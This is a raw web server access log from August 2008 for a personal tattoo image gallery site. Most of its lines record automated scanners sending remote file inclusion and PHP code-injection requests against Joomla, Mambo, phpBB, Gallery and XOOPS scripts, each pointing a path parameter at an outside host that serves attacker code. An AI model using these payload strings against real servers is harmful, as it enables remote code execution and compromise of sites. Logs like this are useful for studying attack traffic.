122.108.234.16 - - [16/Aug/2008:23:00:51 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
122.108.234.16 - - [16/Aug/2008:23:00:51 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
122.108.234.16 - - [16/Aug/2008:23:00:51 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
122.108.234.16 - - [16/Aug/2008:23:00:51 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
122.108.234.16 - - [16/Aug/2008:23:00:51 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
122.108.234.16 - - [16/Aug/2008:23:00:52 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
122.108.234.16 - - [16/Aug/2008:23:00:52 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
221.141.3.99 - - [16/Aug/2008:23:01:36 -0500] "GET /logs/access_log.1214179200/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://utilz.info/a4?? HTTP/1.1" 404 356 "-""libwww-perl/5.79"
221.141.3.99 - - [16/Aug/2008:23:01:36 -0500] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://utilz.info/a4?? HTTP/1.1" 404 329 "-""libwww-perl/5.79"
221.141.3.99 - - [16/Aug/2008:23:01:37 -0500] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://utilz.info/a4?? HTTP/1.1" 404 334 "-""libwww-perl/5.79"
69.61.106.55 - - [16/Aug/2008:23:05:06 -0500] "GET /logs/access_log.1208044800/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://fdp.de/vorschaltseite/did.txt? HTTP/1.1" 404 352 "-""libwww-perl/5.812"
67.19.173.36 - - [16/Aug/2008:23:05:24 -0500] "GET /logs/access_log.1208044800/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://fdp.de/vorschaltseite/did.txt? HTTP/1.1" 404 352 "-""libwww-perl/5.65"
81.26.215.28 - - [16/Aug/2008:23:05:52 -0500] "GET /logs/access_log.1214524800/db.php?path_local=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.65"
81.26.215.28 - - [16/Aug/2008:23:05:52 -0500] "GET /db.php?path_local=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 290 "-""libwww-perl/5.65"
81.26.215.28 - - [16/Aug/2008:23:05:52 -0500] "GET /logs/db.php?path_local=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.65"
122.108.234.16 - - [16/Aug/2008:23:05:53 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
122.108.234.16 - - [16/Aug/2008:23:05:53 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
122.108.234.16 - - [16/Aug/2008:23:05:53 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
122.108.234.16 - - [16/Aug/2008:23:05:54 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
193.201.218.158 - - [16/Aug/2008:23:07:20 -0500] "GET /logs/access_log.1214438400/phphtml.php?htmlclass_path=http://www.reinaldo.kit.net/cmdtotal.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
81.26.215.28 - - [16/Aug/2008:23:08:35 -0500] "GET /logs/access_log.1208217600/db.php?path_local=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.65"
59.125.211.84 - - [16/Aug/2008:23:10:10 -0500] "GET /logs//errors/needinit.php?GALLERY_BASEDIR=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
59.125.211.84 - - [16/Aug/2008:23:10:12 -0500] "GET //errors/needinit.php?GALLERY_BASEDIR=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.79"
81.26.215.28 - - [16/Aug/2008:23:11:26 -0500] "GET /logs/access_log.1214438400/db.php?path_local=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.65"
217.197.68.66 - - [16/Aug/2008:23:13:43 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://tutorials.fyreblade.com/coges.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.803"
217.197.68.66 - - [16/Aug/2008:23:13:44 -0500] "GET /lostpasswd.php?env[include_prefix]=http://tutorials.fyreblade.com/coges.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
81.26.215.28 - - [16/Aug/2008:23:13:58 -0500] "GET /logs/access_log.1213488000/db.php?path_local=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt?? HTTP/1.1" 404 317 "-""libwww-perl/5.65"
217.25.160.1 - - [16/Aug/2008:23:14:21 -0500] "GET /logs/access_log.1214524800//playing.php/common/db.php?commonpath=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 337 "-""libwww-perl/5.803"
217.25.160.1 - - [16/Aug/2008:23:14:25 -0500] "GET //playing.php/common/db.php?commonpath=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.803"
217.25.160.1 - - [16/Aug/2008:23:14:29 -0500] "GET /logs//playing.php/common/db.php?commonpath=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.803"
200.155.18.50 - - [16/Aug/2008:23:18:10 -0500] "GET /index1.php?=http://www.shopbijou.com/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
200.155.18.50 - - [16/Aug/2008:23:18:10 -0500] "GET /logs/access_log.1208044800/index1.php?=http://www.shopbijou.com/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
200.155.18.50 - - [16/Aug/2008:23:18:11 -0500] "GET /logs/index1.php?=http://www.shopbijou.com/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.108.67.131 - - [16/Aug/2008:23:21:59 -0500] "GET /logs//contenido.php?sec=http://www.hotelsunflower.it/images/zoom/splash.me.gif? HTTP/1.1" 404 303 "-""libwww-perl/5.812"
89.108.67.131 - - [16/Aug/2008:23:22:00 -0500] "GET //contenido.php?sec=http://www.hotelsunflower.it/images/zoom/splash.me.gif? HTTP/1.1" 404 298 "-""libwww-perl/5.812"
65.55.208.132 - - [16/Aug/2008:23:22:22 -0500] "GET /logs/access_log.1210377600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
66.230.197.245 - - [16/Aug/2008:23:22:24 -0500] "GET /logs/access_log.1214438400/components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 357 "-""libwww-perl/5.810"
200.251.46.29 - - [16/Aug/2008:23:22:26 -0500] "GET /logs/access_log.1208044800//popup_window.php?site_isp_root=http://www.gugn.ru/news/data/archives/arab.txt? HTTP/1.1" 404 328 "-""libwww-perl/5.803"
200.251.46.29 - - [16/Aug/2008:23:22:28 -0500] "GET //popup_window.php?site_isp_root=http://www.gugn.ru/news/data/archives/arab.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.803"
200.251.46.29 - - [16/Aug/2008:23:22:34 -0500] "GET /logs//popup_window.php?site_isp_root=http://www.gugn.ru/news/data/archives/arab.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.803"
66.230.197.245 - - [16/Aug/2008:23:25:37 -0500] "GET /logs/access_log.1214524800/components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 357 "-""libwww-perl/5.810"
82.194.76.177 - - [16/Aug/2008:23:26:40 -0500] "GET /logs//contenido.php?sec=http://afe.la/id.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
82.194.76.177 - - [16/Aug/2008:23:26:52 -0500] "GET //contenido.php?sec=http://afe.la/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
205.234.193.162 - - [16/Aug/2008:23:27:38 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://vncx.t35.com/scan/id44.txt?? HTTP/1.1" 404 352 "-""libwww-perl/5.810"
205.234.193.162 - - [16/Aug/2008:23:27:38 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://vncx.t35.com/scan/id44.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.810"
82.194.76.177 - - [16/Aug/2008:23:29:53 -0500] "GET /logs//contenido.php?sec=http://afe.la/id.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
82.194.76.177 - - [16/Aug/2008:23:29:58 -0500] "GET //contenido.php?sec=http://afe.la/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
82.194.76.177 - - [16/Aug/2008:23:30:11 -0500] "GET /logs//contenido.php?sec=http://afe.la/id.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
82.194.76.177 - - [16/Aug/2008:23:30:11 -0500] "GET //contenido.php?sec=http://afe.la/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
82.194.76.177 - - [16/Aug/2008:23:30:48 -0500] "GET /logs//contenido.php?sec=http://afe.la/id.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
82.194.76.177 - - [16/Aug/2008:23:30:48 -0500] "GET //contenido.php?sec=http://afe.la/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
64.26.63.11 - - [16/Aug/2008:23:30:50 -0500] "GET /logs/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.803"
64.26.63.11 - - [16/Aug/2008:23:30:50 -0500] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.803"
59.125.211.84 - - [16/Aug/2008:23:31:24 -0500] "GET /logs/access_log.1213401600//errors/needinit.php?GALLERY_BASEDIR=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.79"
82.194.76.177 - - [16/Aug/2008:23:31:25 -0500] "GET //contenido.php?sec=http://afe.la/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
59.125.211.84 - - [16/Aug/2008:23:31:25 -0500] "GET //errors/needinit.php?GALLERY_BASEDIR=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 404 304 "-""libwww-perl/5.79"
59.125.211.84 - - [16/Aug/2008:23:31:26 -0500] "GET /logs//errors/needinit.php?GALLERY_BASEDIR=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
82.194.76.177 - - [16/Aug/2008:23:31:29 -0500] "GET /logs//contenido.php?sec=http://afe.la/id.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
216.139.67.90 - - [16/Aug/2008:23:31:37 -0500] "GET //components/com_flyspray/startdown.php?file=http://vorenburge.ru/images/id.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.64"
216.139.67.90 - - [16/Aug/2008:23:31:42 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://vorenburge.ru/images/id.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.64"
69.61.106.55 - - [16/Aug/2008:23:32:12 -0500] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://matrix-computers.net//language/Za/bot.txt?? HTTP/1.1" 404 307 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
69.61.106.55 - - [16/Aug/2008:23:32:13 -0500] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://matrix-computers.net//language/Za/bot.txt?? HTTP/1.1" 404 302 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
69.61.106.55 - - [16/Aug/2008:23:32:15 -0500] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://matrix-computers.net//language/Za/bot.txt?? HTTP/1.1" 404 302 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
69.61.106.55 - - [16/Aug/2008:23:32:15 -0500] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://matrix-computers.net//language/Za/bot.txt?? HTTP/1.1" 404 307 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
200.155.18.50 - - [16/Aug/2008:23:34:00 -0500] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.shopbijou.com/id.txt??? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
200.155.18.50 - - [16/Aug/2008:23:34:11 -0500] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.shopbijou.com/id.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
84.246.192.60 - - [16/Aug/2008:23:36:10 -0500] "GET /logs/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gugn.ru/news/data/archives/arab.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
84.246.192.60 - - [16/Aug/2008:23:36:13 -0500] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gugn.ru/news/data/archives/arab.txt? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
62.109.176.109 - - [16/Aug/2008:23:37:30 -0500] "GET /logs/access_log.1213488000//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
62.109.176.109 - - [16/Aug/2008:23:38:04 -0500] "GET /logs/access_log.1214179200//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
217.197.68.66 - - [16/Aug/2008:23:38:32 -0500] "GET /logs/access_log.1214179200/lostpasswd.php?env[include_prefix]=http://tutorials.fyreblade.com/coges.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.803"
217.197.68.66 - - [16/Aug/2008:23:38:32 -0500] "GET /lostpasswd.php?env[include_prefix]=http://tutorials.fyreblade.com/coges.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
217.197.68.66 - - [16/Aug/2008:23:38:32 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://tutorials.fyreblade.com/coges.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.803"
216.139.67.90 - - [16/Aug/2008:23:39:05 -0500] "GET /logs/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gugn.ru/news/data/archives/arab.txt? HTTP/1.1" 404 327 "-""libwww-perl/5.64"
216.139.67.90 - - [16/Aug/2008:23:39:05 -0500] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gugn.ru/news/data/archives/arab.txt? HTTP/1.1" 404 322 "-""libwww-perl/5.64"
64.105.33.158 - - [16/Aug/2008:23:39:20 -0500] "GET /logs/access_log.1205366400/errors.php?error=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
67.19.51.194 - - [16/Aug/2008:23:39:26 -0500] "GET /logs/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
67.19.51.194 - - [16/Aug/2008:23:39:26 -0500] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
81.26.215.28 - - [16/Aug/2008:23:40:53 -0500] "GET /logs//config.php?path_to_root=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt???? HTTP/1.1" 404 300 "-""libwww-perl/5.65"
81.26.215.28 - - [16/Aug/2008:23:40:53 -0500] "GET //config.php?path_to_root=http://www.horde-hunterz.co.uk/xoops/xoops/safe.txt???? HTTP/1.1" 404 295 "-""libwww-perl/5.65"
189.19.47.160 - - [16/Aug/2008:23:44:26 -0500] "GET /logs/access_log.1206230400//modules/TotalCalendar/about.php?inc_dir=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
189.19.47.160 - - [16/Aug/2008:23:44:26 -0500] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.803"
189.19.47.160 - - [16/Aug/2008:23:44:31 -0500] "GET //modules/TotalCalendar/about.php?inc_dir=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.1" 404 316 "-""libwww-perl/5.803"
189.70.11.137 - - [16/Aug/2008:23:45:06 -0500] "GET //modules/TotalCalendar/about.php?inc_dir=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.0" 404 304 "-""libwww-perl/5.79"
189.70.11.137 - - [16/Aug/2008:23:45:06 -0500] "GET /logs/access_log.1206230400//modules/TotalCalendar/about.php?inc_dir=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.0" 404 331 "-""libwww-perl/5.79"
189.70.11.137 - - [16/Aug/2008:23:45:06 -0500] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.0" 404 309 "-""libwww-perl/5.79"
206.252.131.151 - - [16/Aug/2008:23:45:34 -0500] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 304 "-""libwww-perl/5.79"
206.252.131.151 - - [16/Aug/2008:23:45:34 -0500] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 304 "-""libwww-perl/5.79"
206.252.131.151 - - [16/Aug/2008:23:45:34 -0500] "GET //init_basic.php?GALLERY_BASEDIR=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
206.252.131.151 - - [16/Aug/2008:23:45:34 -0500] "GET //init_basic.php?GALLERY_BASEDIR=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
193.201.218.158 - - [16/Aug/2008:23:45:51 -0500] "GET /logs/access_log.1214524800/phphtml.php?htmlclass_path=http://www.reinaldo.kit.net/cmdtotal.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
193.188.66.6 - - [16/Aug/2008:23:46:04 -0500] "GET //init_basic.php?GALLERY_BASEDIR=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
193.188.66.6 - - [16/Aug/2008:23:46:04 -0500] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://superspeedlearning.com/test.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
67.15.186.5 - - [16/Aug/2008:23:46:51 -0500] "GET //?path%5Bdocroot%5D=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.65"
62.87.154.41 - - [16/Aug/2008:23:46:54 -0500] "GET /logs/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.803"
62.87.154.41 - - [16/Aug/2008:23:46:55 -0500] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gugn.ru/news/data/archives/id2.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.803"
67.15.186.5 - - [16/Aug/2008:23:47:41 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 200 95586 "-""libwww-perl/5.65"
67.15.186.5 - - [16/Aug/2008:23:47:41 -0500] "GET //?path%5Bdocroot%5D=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.65"
67.15.186.5 - - [16/Aug/2008:23:47:42 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.65"
67.15.186.5 - - [16/Aug/2008:23:47:42 -0500] "GET //?path%5Bdocroot%5D=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.65"
67.15.186.5 - - [16/Aug/2008:23:47:43 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 200 95586 "-""libwww-perl/5.65"
189.70.11.137 - - [16/Aug/2008:23:50:08 -0500] "GET //modules/TotalCalendar/about.php?inc_dir=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.0" 404 304 "-""libwww-perl/5.79"
189.19.47.160 - - [16/Aug/2008:23:51:48 -0500] "GET //modules/TotalCalendar/about.php?inc_dir=http://vncx.t35.com/scan/idnew.txt??? HTTP/1.1" 404 316 "-""libwww-perl/5.803"
218.38.18.28 - - [16/Aug/2008:23:54:29 -0500] "GET /logs//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
218.38.18.28 - - [16/Aug/2008:23:54:30 -0500] "GET //components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
200.155.18.50 - - [16/Aug/2008:23:55:16 -0500] "GET /logs/access_log.1211500800//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.shopbijou.com/id.txt??? HTTP/1.1" 404 378 "-""libwww-perl/5.805"
200.155.18.50 - - [16/Aug/2008:23:55:16 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.shopbijou.com/id.txt??? HTTP/1.1" 404 351 "-""libwww-perl/5.805"
200.155.18.50 - - [16/Aug/2008:23:55:20 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.shopbijou.com/id.txt??? HTTP/1.1" 404 356 "-""libwww-perl/5.805"
200.155.18.50 - - [16/Aug/2008:23:55:29 -0500] "GET /logs/access_log.1206230400/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.shopbijou.com/id.txt??? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
200.155.18.50 - - [16/Aug/2008:23:55:29 -0500] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.shopbijou.com/id.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
200.155.18.50 - - [16/Aug/2008:23:55:31 -0500] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.shopbijou.com/id.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
218.38.12.93 - - [16/Aug/2008:23:55:52 -0500] "GET /logs//components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
218.38.12.93 - - [16/Aug/2008:23:55:53 -0500] "GET //components/com_loudmouth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
218.38.12.93 - - [16/Aug/2008:23:56:14 -0500] "GET /logs/access_log.1206230400//skin/zero_vote/login.php?dir=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
218.38.12.93 - - [16/Aug/2008:23:56:15 -0500] "GET //skin/zero_vote/login.php?dir=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
218.38.12.93 - - [16/Aug/2008:23:56:15 -0500] "GET /logs//skin/zero_vote/login.php?dir=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
218.38.18.28 - - [16/Aug/2008:23:56:54 -0500] "GET /logs/access_log.1206230400//skin/zero_vote/login.php?dir=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
218.38.18.28 - - [16/Aug/2008:23:56:54 -0500] "GET //skin/zero_vote/login.php?dir=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
218.38.18.28 - - [16/Aug/2008:23:56:54 -0500] "GET /logs//skin/zero_vote/login.php?dir=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
218.38.18.28 - - [16/Aug/2008:23:57:17 -0500] "GET /logs//skin/zero_vote/login.php?dir=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
218.38.18.28 - - [16/Aug/2008:23:57:18 -0500] "GET //skin/zero_vote/login.php?dir=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
218.38.12.93 - - [16/Aug/2008:23:57:38 -0500] "GET /logs//skin/zero_vote/login.php?dir=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
218.38.12.93 - - [16/Aug/2008:23:57:39 -0500] "GET //skin/zero_vote/login.php?dir=http://www.skkulove.com/bbs//r0x.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
206.252.131.151 - - [16/Aug/2008:23:58:16 -0500] "GET /logs/access_log.1206230400//init_basic.php?GALLERY_BASEDIR=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
206.252.131.151 - - [16/Aug/2008:23:58:16 -0500] "GET /logs/access_log.1206230400//init_basic.php?GALLERY_BASEDIR=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
206.252.131.151 - - [16/Aug/2008:23:58:16 -0500] "GET //init_basic.php?GALLERY_BASEDIR=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
206.252.131.151 - - [16/Aug/2008:23:58:16 -0500] "GET //init_basic.php?GALLERY_BASEDIR=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
206.252.131.151 - - [16/Aug/2008:23:58:16 -0500] "GET /logs//init_basic.php?GALLERY_BASEDIR=http://septimamaipu.cl/septima/mambots/idar.txt? HTTP/1.1" 404 304 "-""libwww-perl/5.79"
